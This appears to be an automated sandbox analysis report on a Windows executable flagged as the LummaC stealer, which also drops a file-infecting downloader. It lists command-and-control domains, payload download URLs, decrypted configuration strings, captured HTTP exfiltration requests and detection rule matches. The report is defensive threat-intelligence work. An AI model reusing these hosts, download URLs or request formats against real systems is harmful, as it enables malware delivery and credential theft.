Windows Analysis Report
current[1].exe

AV Detection

Source: current[1].exe

Avira: detected

Source: http://ddos.dnsnb8.net:799/cj//k2.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManagerA	Avira URL Cloud: Label: phishing
Source: triangleseasonbenchwj.shop	Avira URL Cloud: Label: phishing
Source: sofahuntingslidedine.shop	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarh?	Avira URL Cloud: Label: malware
Source: modestessayevenmilwek.shop	Avira URL Cloud: Label: malware
Source: https://sofahuntingslidedine.shop/api	Avira URL Cloud: Label: phishing
Source: secretionsuitcasenioise.shop	Avira URL Cloud: Label: phishing
Source: https://sofahuntingslidedine.shop/	Avira URL Cloud: Label: phishing
Source: https://sofahuntingslidedine.shop/u	Avira URL Cloud: Label: phishing
Source: gemcreedarticulateod.shop	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarl	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarp	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rark	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarE0	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarm	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarT	Avira URL Cloud: Label: phishing
Source: https://sofahuntingslidedine.shop/apik	Avira URL Cloud: Label: phishing
Source: culturesketchfinanciall.shop	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarN	Avira URL Cloud: Label: phishing

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B

Source: 0.2.current[1].exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["sofahuntingslidedine.shop", "culturesketchfinanciall.shop", "triangleseasonbenchwj.shop", "modestessayevenmilwek.shop", "liabilityarrangemenyit.shop", "claimconcessionrebe.shop", "secretionsuitcasenioise.shop", "gemcreedarticulateod.shop", "sofahuntingslidedine.shop"], "Build id": "P6Mk0M--key"}

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected

Source: current[1].exe

Joe Sandbox ML: detected

Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: sofahuntingslidedine.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: culturesketchfinanciall.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: triangleseasonbenchwj.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: modestessayevenmilwek.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: liabilityarrangemenyit.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: claimconcessionrebe.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: secretionsuitcasenioise.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: gemcreedarticulateod.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: sofahuntingslidedine.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: P6Mk0M--key

Compliance

Source: C:\Users\user\Desktop\current[1].exe

Unpacked PE file: 0.2.current[1].exe.400000.0.unpack

Source: current[1].exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\current[1].exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2

Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source:	Binary string: .C:\yatafekubigu\xegoh\kegokececana\hobof.pdb source: current[1].exe
Source:	Binary string: C:\yatafekubigu\xegoh\kegokececana\hobof.pdb source: current[1].exe

Spreading

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E929E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_00E929E2

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E92B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00E92B8C

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\			Jump to behavior

Software Vulnerabilities

Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [ecx], eax		0_2_00462440
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then inc edi		0_2_004238A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_00427139
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_0042A182
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_0042A190
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_00428251
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov byte ptr [ebx], al		0_2_0044A22D
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp ecx		0_2_00461236
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp ecx		0_2_00461234
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov byte ptr [ebx], al		0_2_00448B92
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov esi, ecx		0_2_004143C0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp al, 2Eh		0_2_00445430
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_00430480
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch]		0_2_0045C480
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, dword ptr [esi+2Ch]		0_2_00430565
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp esi		0_2_00461516
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then lea eax, dword ptr [edi+04h]		0_2_004305F1
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_0042D639
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then test eax, eax		0_2_004596F2
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then xor ebx, ebx		0_2_0042A732
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, edx		0_2_0041E7C0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_004387C0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_004387BB
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp ecx		0_2_00460846
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_0042B802
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_00445807
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [edx-08h], edi		0_2_00464800
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_0042A805
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_0042AB0E
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_004458D7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_004458F2
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_004478BD
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_00447947
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_00447962
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov edi, C6989171h		0_2_0042B913
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [ecx], eax		0_2_0042E920
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, dword ptr [00475144h]		0_2_0043C990
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then push dword ptr [esi+4Ch]		0_2_00445A02
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [ecx], eax		0_2_0045CA90
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov byte ptr [edx], bl		0_2_00425C07
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then movzx esi, word ptr [ecx+eax*4]		0_2_0041CD30
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then movzx ebx, byte ptr [edx+edi]		0_2_00401EE0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, dword ptr [0047E78Ch]		0_2_0045FEE3
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov word ptr [ecx], dx		0_2_0042FF6C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, dword ptr [0047E78Ch]		0_2_0045FEE3
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h		0_2_00429F35
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then movzx ebx, byte ptr [edx+edi]		0_2_00742147
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov word ptr [ecx], dx		0_2_007701D3
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h		0_2_0076A19C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_0076A3F7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_0076A3E9
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_007673A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_007684B8
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov byte ptr [ebx], al		0_2_0078A494
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov byte ptr [ebx], al		0_2_00788DF9
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov esi, ecx		0_2_00754627
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_007706E7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch]		0_2_0079C6E7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [ecx], eax		0_2_007A26A7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp al, 2Eh		0_2_00785697
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, dword ptr [esi+2Ch]		0_2_007707CC
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then lea eax, dword ptr [edi+04h]		0_2_00770858
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_0076D8A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then test eax, eax		0_2_00799959
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then xor ebx, ebx		0_2_0076A999
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_0076AD75
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_00785A73
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_0076AA6C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [edx-08h], edi		0_2_007A4A67
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_0076BA69
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_00778A27
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, edx		0_2_0075EA27
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_00778A22
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, dword ptr [esi+000000B8h]		0_2_00769ABD
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov edi, C6989171h		0_2_0076BB7A
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_00785B59
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_00785B3E
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_00787B24
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then inc edi		0_2_00763B07
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, dword ptr [00475144h]		0_2_0077CBF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_00787BC9
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax		0_2_00787BAE
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [ecx], eax		0_2_0076EB87
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then push dword ptr [esi+4Ch]		0_2_00785C69
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [ecx], eax		0_2_0079CCF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov byte ptr [edx], bl		0_2_00765E6E
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then movzx esi, word ptr [ecx+eax*4]		0_2_0075CF97

Networking

Source: Malware configuration extractor	URLs: sofahuntingslidedine.shop
Source: Malware configuration extractor	URLs: culturesketchfinanciall.shop
Source: Malware configuration extractor	URLs: triangleseasonbenchwj.shop
Source: Malware configuration extractor	URLs: modestessayevenmilwek.shop
Source: Malware configuration extractor	URLs: liabilityarrangemenyit.shop
Source: Malware configuration extractor	URLs: claimconcessionrebe.shop
Source: Malware configuration extractor	URLs: secretionsuitcasenioise.shop
Source: Malware configuration extractor	URLs: gemcreedarticulateod.shop
Source: Malware configuration extractor	URLs: sofahuntingslidedine.shop

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 799

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799

Source: Joe Sandbox View	IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sofahuntingslidedine.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=_2SNjID_zmQ4tMLgutu16zJ8STSYOqYvGDcmnrSWpYo-1721859949-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sofahuntingslidedine.shop
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E91099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

1_2_00E91099

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: global traffic	DNS traffic detected: DNS query: sofahuntingslidedine.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sofahuntingslidedine.shop

Source: jJEAWO.exe, 00000001.00000003.1675913190.0000000000E80000.00000004.00001000.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862470986.0000000000E93000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: jJEAWO.exe, 00000001.00000003.1683352875.000000000107B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: jJEAWO.exe, 00000001.00000003.1683352875.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683579567.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarE0
Source: jJEAWO.exe, 00000001.00000003.1683506510.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarT
Source: jJEAWO.exe, 00000001.00000003.1683352875.00000000010EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
Source: jJEAWO.exe, 00000001.00000002.1862651851.000000000105E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: jJEAWO.exe, 00000001.00000002.1862651851.000000000109F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManagerA
Source: jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarN
Source: jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarh?
Source: jJEAWO.exe, 00000001.00000002.1862651851.000000000105E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rark
Source: jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarl
Source: jJEAWO.exe, 00000001.00000002.1862651851.000000000105E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarm
Source: jJEAWO.exe, 00000001.00000002.1863177242.0000000002DBA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp
Source: Amcache.hve.1.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: jJEAWO.exe, 00000001.00000003.1683506510.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com2
Source: current[1].exe, 00000000.00000002.2053363980.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sofahuntingslidedine.shop/
Source: current[1].exe, 00000000.00000003.2020633565.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053204670.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.2020575396.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707640338.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2052970229.000000000081E000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.2020471181.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053363980.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sofahuntingslidedine.shop/api
Source: current[1].exe, 00000000.00000003.2020633565.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.2020575396.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053363980.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sofahuntingslidedine.shop/apik
Source: current[1].exe, 00000000.00000003.2020471181.000000000089A000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707811358.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053204670.000000000089A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sofahuntingslidedine.shop/u
Source: current[1].exe, 00000000.00000003.1707640338.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707811358.0000000000894000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707606358.0000000002BA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: current[1].exe, 00000000.00000003.1707640338.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707606358.0000000002BA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/ddos/glossary/malware/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: SciTE.exe.1.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_c9d56119-2

System Summary

Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2053042174.000000000082E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: current[1].exe	Static PE information: section name: ESu,
Source: MyProg.exe.1.dr	Static PE information: section name: Y|uR

Source: jJEAWO.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

